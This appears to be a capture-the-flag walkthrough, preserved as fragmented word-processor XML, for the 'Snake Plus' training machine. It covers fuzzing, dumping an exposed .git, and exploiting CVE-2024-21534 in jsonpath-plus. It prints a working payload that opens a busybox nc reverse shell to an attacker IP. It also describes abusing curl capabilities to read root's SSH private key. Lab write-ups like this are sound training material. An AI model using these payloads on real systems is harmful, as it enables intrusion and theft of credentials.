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yvqrp2ch0l8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k3xceg73v6e1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Snake Plus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require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6iztfzcg48ef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enumerate the open ports on the application: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IP=&lt;IP_DA_MÁQUINA&gt;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rustscan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250" cy="4029547"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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13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02954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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dqdqm53azmsg" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1 - Open ports scan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observe that ports 22 and 80 are open. When accessing port 80, we see that it redirects to snake.hc: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5463" cy="3233921"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2339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240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8kv1uws1z8fp" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 - Access via hostname is not possible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Therefore, we must add this hostname to the hosts file at “/etc/hosts”</w:t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&lt;IP_DA_MÁQUINA&gt;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snake.hc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Now, when accessing the application in the browser, we see the Snake game screen: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1025" cy="2776261"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4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762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heading=h.pvv6vilhvzgu" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3 - After editing the hosts file, the application becomes accessible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typing “bispo” and clicking on “Retrieve Score,” you will obtain the value 9999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2470" cy="3337163"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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470" cy="33371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240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hvba3ps8lyrn" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4 - bispo’s score is 9999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when typing “ahnao,” you see the score -9999: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1925" cy="3182700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4845" l="0" r="0" t="708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heading=h.dterimyxblum" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 - ahnao’s score is -9999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clicking on start game, it is possible to play the Snake game and save your score.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7175" cy="2913622"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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3184" l="0" r="0" t="913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9136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heading=h.clvmjcvjufwr" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6 - Saving the score for user hacker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now, we only have control over this username field.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perform fuzzing against the application to identify other possible paths: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feroxbuster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&lt;http://snake.hc/&gt;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--wordlist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/usr/share/wordlists/SecLists/Fuzzing/fuzz-Bo0oM.txt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--filter-status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301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48350" cy="2619375"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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16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19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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.25tkurikl6em" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 - Fuzzing the application reveals exposed .git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observe that there is an exposed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 We can use git-dumper to dump the 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git-dumper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&lt;http://snake.hc&gt;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95825" cy="3041516"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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415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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5jr3uqydkdol" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8 - Dumping the source code using git-dumper</w:t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7iwy2uc0ape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Exploitation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game.js file inside the routes folder, we observe that both in the “save-score” and “get-score” routes, the JSONPath function is used to read the JSON files where the scores are stored:</w:t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18175"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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45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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.vtoekscxtl5w" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9 - JSONPath function located in the code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Scrolling up to review the library imports, we see that it uses the jsonpath-plus library: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1162050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heading=h.a41sxkl824ca" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 - Identifying the use of the jsonpath-plus library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searching for the name of this library on Google, we can identify that there is a vulnerability in this library that allows Remote Code Execution (RCE) (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CVE-2024-21534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  To exploit the vulnerability, we need to manipulate the “query” parameter that is passed to the JSONPath function.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7338" cy="723900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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52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72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240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.712c19oneyk4" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 11 - Query passed to the vulnerable library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modify this query, we first need to close the username parameter and create a new parameter that calls the constructor in order to invoke the child_process.execSync function.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some trial and error, we arrived at the following payload (using busybox nc as a reverse shell payload):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_$_root=[].constructor.constructor("this.process.mainModule.require('child_process').execSync('busybox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&lt;IP_MAQUINA_DE_ATAQUE&gt;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&lt;PORTA&gt;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bash')");@root();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@.username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my case, the payload becomes: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_$_root=[].constructor.constructor("this.process.mainModule.require('child_process').execSync('busybox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10.0.42.202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bash')");@root();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@.username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start a listener to receive the connection:</w:t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-nvlp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insert the payload and click to save the score:</w:t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2308" cy="3413363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308" cy="341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heading=h.kcbyjwnj9t25" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 - Saving the score with the payload as username triggers remote code execution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we successfully receive the reverse shell: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250" cy="1200666"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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006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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.awd1manpzn4d" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 13 - Receiving the shell on the listener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upgrade the terminal to Full TTY:</w:t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TERM=xterm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Press Ctrl + Z and on the attack machine type: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home directory of user snake, we find the user flag.</w:t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123825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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.sn1y40lf1fl5" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 14 - Obtaining the user flag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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3cp5xvj2jphh" w:id="18"/>
      <w:bookmarkEnd w:id="18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6"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation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enumerating possible ways to escalate privileges to root, we identified that curl has all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capabilities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enabled, which means it will always run as root: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getcap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0539" cy="707019"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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365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539" cy="7070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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.s9pedaof3z8s" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 15 - Enumerating enabled capabilities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Thus, it is possible to read files using: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file://&lt;PATH_DO_ARQUIVO&gt;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read the root flag directly, but if we want to obtain a root shell, that is also possible. When reading root’s .bash_history file, we see that an SSH key was created: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8475" cy="1390035"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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900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before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.x4zemprl44ed" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16 - Reading the .bash_history file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 we can read root’s SSH private key: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4624204"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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6242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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3m1u50yyxduw" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 17 - Reading root’s SSH key using curl</w:t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that, we can copy its contents, save it into a file on the attack machine named id_rsa, and assign the proper permissions with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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that, we can connect via SSH as root and retrieve the final flag:</w:t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root@snake.hc</w:t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 root.txt</w:t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9088" cy="4193604"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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41936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240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.wwyk5guw7s82" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 18 - Obtaining the root flag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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.razz1f58ur6k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3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4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Snake Plus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3001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hyperlink" Target="https://www.upwind.io/feed/critical-rce-vulnerability-in-jsonpath-plus-cve-2024-21534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hyperlink" Target="https://www.thehacker.recipes/infra/privilege-escalation/unix/capabilities" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png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app.hackingclub.com/training/training-machines/224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0.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml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36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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juvbaETfXrP0+k4CoduTYy5zQ==">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